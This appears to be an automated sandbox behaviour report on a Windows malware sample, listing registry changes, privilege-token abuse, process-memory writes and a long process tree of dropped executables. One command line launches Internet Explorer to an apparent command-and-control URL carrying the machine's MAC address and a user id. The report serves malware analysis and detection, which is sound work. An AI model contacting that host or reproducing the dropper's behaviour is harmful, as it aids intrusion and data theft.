Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b00000000020000000000106600000001000020000000e588f78ed2fe91ac00185883e98bef35215f22505bc5eb76989ed814bc2506d6000000000e80000000020000200000001725c00718a99e9c077fa9662852d29495209a31c0475491de9303ea8f1fb7ef900000008c9f87269058c109a613d76db1c6f995ef98c0a9b1ff41dc8c1d721926bb6992a6396d84f08b5fcc97340ad132dbdb474b11bbde9dbe8f8d4d68d3ce18524d92bc8483e467da7ae44a1f2fae30e2176bd604a514781c6bbb1ac85c9087ee6447a96cc713121b290482080b8ce986bc66e73c003b13a3a5cccea8c5bc1a45a23765d57908f2b030b33ff5a4cd0bc4462d400000002169791d2f7c1131b0410ac6fdc11aaff4ae8d5f227a5ac44f30eddc20a04640a3bed13b9fa3185832a8a4df758aee681369a10ef061a4251e61e4912a09d7dd	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b0000000002000000000010660000000100002000000060c8518065c6646ac8e9efb5885a011d9439df52eb66a7332b0ff265be9daaf9000000000e80000000020000200000001167402faf9227ed0bdf92ac1c2417d23dc74a9be6cbf8fb5495dca7f34dabdc20000000a6c1b364e0d9dbbcca02d3b309202358be3a81e0c326c66ab48356e93c9789b54000000087ee58f447e2b073470ff8460bc63b33c2713e2f46c01b4dd26fef555b5698292496c87e444e3c13bf556e83eba6a8a8f963b4e58851316185604d47e68a164d	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe
Token: SeLoadDriverPrivilege	2724	GZbKFaB.exe
Token: SeLoadDriverPrivilege	1560	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2272	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1692	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1964	yvdnDE4.exe
Token: SeLoadDriverPrivilege	3032	yvdnDE4.exe
Token: SeLoadDriverPrivilege	3044	yvdnDE4.exe
Token: SeLoadDriverPrivilege	572	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1780	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2632	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2816	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1240	yvdnDE4.exe
Token: SeLoadDriverPrivilege	524	yvdnDE4.exe
Token: SeLoadDriverPrivilege	548	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1712	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2184	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2284	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2044	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2276	yvdnDE4.exe
Token: SeLoadDriverPrivilege	868	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1988	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1456	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1816	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1700	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1932	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2352	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2240	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1804	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1588	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2612	yvdnDE4.exe
Token: SeLoadDriverPrivilege	840	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2032	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2616	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2928	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2908	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1008	yvdnDE4.exe
Token: SeLoadDriverPrivilege	3036	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1656	yvdnDE4.exe
Token: SeLoadDriverPrivilege	344	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1564	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2972	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1600	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1996	yvdnDE4.exe
Token: SeLoadDriverPrivilege	860	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1200	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2756	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1724	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2864	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2696	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2520	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2652	yvdnDE4.exe
Token: SeLoadDriverPrivilege	856	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2508	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2592	yvdnDE4.exe
Token: SeLoadDriverPrivilege	624	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2884	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1304	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1112	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1076	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2428	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1208	yvdnDE4.exe
Token: SeLoadDriverPrivilege	2828	yvdnDE4.exe
Token: SeLoadDriverPrivilege	1392	yvdnDE4.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2748	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2748	IEXPLORE.EXE
2748	IEXPLORE.EXE
2812	IEXPLORE.EXE
2812	IEXPLORE.EXE
2812	IEXPLORE.EXE
2812	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2648	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	30
PID 2792 wrote to memory of 2648	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	30
PID 2792 wrote to memory of 2648	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	30
PID 2792 wrote to memory of 2648	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	30
PID 2648 wrote to memory of 2748	2648	iexplore.exe	31
PID 2648 wrote to memory of 2748	2648	iexplore.exe	31
PID 2648 wrote to memory of 2748	2648	iexplore.exe	31
PID 2648 wrote to memory of 2748	2648	iexplore.exe	31
PID 2748 wrote to memory of 2812	2748	IEXPLORE.EXE	32
PID 2748 wrote to memory of 2812	2748	IEXPLORE.EXE	32
PID 2748 wrote to memory of 2812	2748	IEXPLORE.EXE	32
PID 2748 wrote to memory of 2812	2748	IEXPLORE.EXE	32
PID 2792 wrote to memory of 2724	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	33
PID 2792 wrote to memory of 2724	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	33
PID 2792 wrote to memory of 2724	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	33
PID 2792 wrote to memory of 2724	2792	f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe	33
PID 2724 wrote to memory of 1560	2724	GZbKFaB.exe	34
PID 2724 wrote to memory of 1560	2724	GZbKFaB.exe	34
PID 2724 wrote to memory of 1560	2724	GZbKFaB.exe	34
PID 2724 wrote to memory of 1560	2724	GZbKFaB.exe	34
PID 1560 wrote to memory of 2272	1560	yvdnDE4.exe	35
PID 1560 wrote to memory of 2272	1560	yvdnDE4.exe	35
PID 1560 wrote to memory of 2272	1560	yvdnDE4.exe	35
PID 1560 wrote to memory of 2272	1560	yvdnDE4.exe	35
PID 2272 wrote to memory of 1692	2272	yvdnDE4.exe	36
PID 2272 wrote to memory of 1692	2272	yvdnDE4.exe	36
PID 2272 wrote to memory of 1692	2272	yvdnDE4.exe	36
PID 2272 wrote to memory of 1692	2272	yvdnDE4.exe	36
PID 1692 wrote to memory of 1964	1692	yvdnDE4.exe	37
PID 1692 wrote to memory of 1964	1692	yvdnDE4.exe	37
PID 1692 wrote to memory of 1964	1692	yvdnDE4.exe	37
PID 1692 wrote to memory of 1964	1692	yvdnDE4.exe	37
PID 1964 wrote to memory of 3032	1964	yvdnDE4.exe	38
PID 1964 wrote to memory of 3032	1964	yvdnDE4.exe	38
PID 1964 wrote to memory of 3032	1964	yvdnDE4.exe	38
PID 1964 wrote to memory of 3032	1964	yvdnDE4.exe	38
PID 3032 wrote to memory of 3044	3032	yvdnDE4.exe	39
PID 3032 wrote to memory of 3044	3032	yvdnDE4.exe	39
PID 3032 wrote to memory of 3044	3032	yvdnDE4.exe	39
PID 3032 wrote to memory of 3044	3032	yvdnDE4.exe	39
PID 3044 wrote to memory of 572	3044	yvdnDE4.exe	40
PID 3044 wrote to memory of 572	3044	yvdnDE4.exe	40
PID 3044 wrote to memory of 572	3044	yvdnDE4.exe	40
PID 3044 wrote to memory of 572	3044	yvdnDE4.exe	40
PID 572 wrote to memory of 1780	572	yvdnDE4.exe	41
PID 572 wrote to memory of 1780	572	yvdnDE4.exe	41
PID 572 wrote to memory of 1780	572	yvdnDE4.exe	41
PID 572 wrote to memory of 1780	572	yvdnDE4.exe	41
PID 1780 wrote to memory of 2632	1780	yvdnDE4.exe	42
PID 1780 wrote to memory of 2632	1780	yvdnDE4.exe	42
PID 1780 wrote to memory of 2632	1780	yvdnDE4.exe	42
PID 1780 wrote to memory of 2632	1780	yvdnDE4.exe	42
PID 2632 wrote to memory of 2816	2632	yvdnDE4.exe	44
PID 2632 wrote to memory of 2816	2632	yvdnDE4.exe	44
PID 2632 wrote to memory of 2816	2632	yvdnDE4.exe	44
PID 2632 wrote to memory of 2816	2632	yvdnDE4.exe	44
PID 2816 wrote to memory of 1240	2816	yvdnDE4.exe	45
PID 2816 wrote to memory of 1240	2816	yvdnDE4.exe	45
PID 2816 wrote to memory of 1240	2816	yvdnDE4.exe	45
PID 2816 wrote to memory of 1240	2816	yvdnDE4.exe	45
PID 1240 wrote to memory of 524	1240	yvdnDE4.exe	46
PID 1240 wrote to memory of 524	1240	yvdnDE4.exe	46
PID 1240 wrote to memory of 524	1240	yvdnDE4.exe	46
PID 1240 wrote to memory of 524	1240	yvdnDE4.exe	46

C:\Users\Admin\AppData\Local\Temp\f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\f50a49a6534625d46a74c5998070604e_JaffaCakes118.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=52:7E:38:F5:B4:8B&UserId=104&Bate=1.07&ThreadNum=3&Url=;-
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=52:7E:38:F5:B4:8B&UserId=104&Bate=1.07&ThreadNum=3&Url=;-
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2748 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2812
- \??\c:\GZbKFaB.exe
  c:\GZbKFaB.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
    C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1560
  - - C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
      C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2272
    - - C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1692
      - C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1964
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3032
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:572
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1780
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2632
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2816
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1240
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        14⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:524
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        15⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        16⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        17⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2184
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        18⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1816
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        28⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        29⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1804
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        30⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1588
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        31⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        32⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:840
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        33⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        34⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        35⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        36⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2908
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        37⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1008
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        38⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        39⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        40⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:344
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        41⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        42⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2972
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        43⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        44⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        45⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        46⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        47⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        48⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        49⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        50⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2696
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        51⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2520
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        52⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        53⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:856
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        54⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        55⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        56⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        57⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        58⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
